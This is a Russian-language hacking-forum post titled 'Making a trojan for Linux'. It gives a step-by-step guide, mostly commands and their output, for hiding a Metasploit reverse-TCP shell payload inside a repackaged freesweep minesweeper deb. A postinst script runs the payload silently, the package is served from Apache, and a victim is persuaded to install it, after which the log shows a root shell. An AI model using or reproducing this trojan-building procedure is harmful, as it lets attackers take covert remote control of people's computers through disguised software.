• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    ЗЕРКАЛА ФОРУМА:

    ru-sfera.org

    ru-sfera.online

    Обратная связь:

    Email:[email protected]

    Jabber:[email protected]

    Всего доброго !

Делаем троян для Линукс (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 459
Репутация
7 926
Jabber
Telegram
Отмечу что данная штука может заработать, а может и не заработать. Почему ? Потому-что это Линукс ! ;)

Итак для того, чтобы продемонстрировать, что атаки на «стороне клиента» существуют не только под Windows, мы будем использовать Metasploit для создания Ubuntu deb пакета, чтобы заполучить shell на Linux.

Что будет делать троян:

Троян представляет собой игру под линукс, как только жертва установит и начнет играть в скаченную игру, мы получим Shell ! ;)

Отличное видео выступиления Redmeat_uk демонстрации этой техники, вы можете увидеть на http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

Сначала необходимо загрузить пакет, который мы собираемся «заразить» и перенести его во временный рабочий каталог. В нашем примере мы будем использовать пакет freesweep, текстовая версия Mine Sweeper.

Итак конструируем трояна:

Через консоль вводим следующие команды:

1)Команда: [email protected]:/pentest/exploits/framework3# apt-get --download-only install freeswee

Ответ:
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...

2)Теперь переносим пакет во временный каталог следущими командами:

[email protected]:/pentest/exploits/framework3# mkdir /tmp/evil
[email protected]:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
[email protected]:/pentest/exploits/framework3# cd /tmp/evil/
[email protected]:/tmp/evil#

3) Далее, нам необходимо извлечь пакет в рабочую директорию и создать директорию DEBIAN для добавления наших дополнительных «возможностей».

root@v-bt4-pre:/tmp/evil# dpkg -xfreesweep_0.90-1_i386.debwork
[email protected]:/tmp/evil# mkdir work/DEBIAN

4) В директории «DEBIAN», создайте файл с именем «control», который содержит следующее:

[email protected]:/tmp/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.

5) Нам также необходимо создать после установочный скрипт, который задаст исполняющие права на наши бинарные файлы. В директории «DEBIAN», мы создадим файл с именем «postinst», который содержит следующее:

[email protected]:/tmp/evil/work/DEBIAN# cat postinst
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

6) Теперь создадим наше вредоносное содержимое. Мы будем использовать реверс-шелл бэк-коннекта для подключения к нашей машине под названием «freesweep_scores»:

Команда:
[email protected]:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores

Ответ:
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443

7) Далее сделаем пост-установочный скрипт исполняемым и соберем наш новый пакет. Файл пакета будет называться «work.deb». Изменим его имя на freesweep.deb и скопируем пакет в корневой каталог нашего веб-сервера.

Команды:
[email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst
[email protected]:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work

Ответ:
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.

Команды:
[email protected]:/tmp/evil# mv work.deb freesweep.deb
[email protected]:/tmp/evil# cp freesweep.deb /var/www/

В общем-то и всё теперь как юзать:

1) Для начала запустим веб сервер Apache:

[email protected]:/tmp/evil# /etc/init.d/apache2 start

2) Запустим модуль Metasploit multi/handler для ожидания входящего соединения:

Команда:
[email protected]:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E

Ответ:
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

3) Нашу жертву под Ubuntu, мы должны убедить скачать и установить deb пакет с новой игрой:

На компе жертвы установить можно, например так, вводим команды:

[email protected]:~$ wget http://192.168.1.101/freesweep.deb
[email protected]:~$ sudo dpkg -i freesweep.deb

4) Как только жертва установит и начнет играть в скаченную игру, мы получим shell:

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)
ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...
hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)

Источник: http://www.offensive-security.com/metasploit-unleashed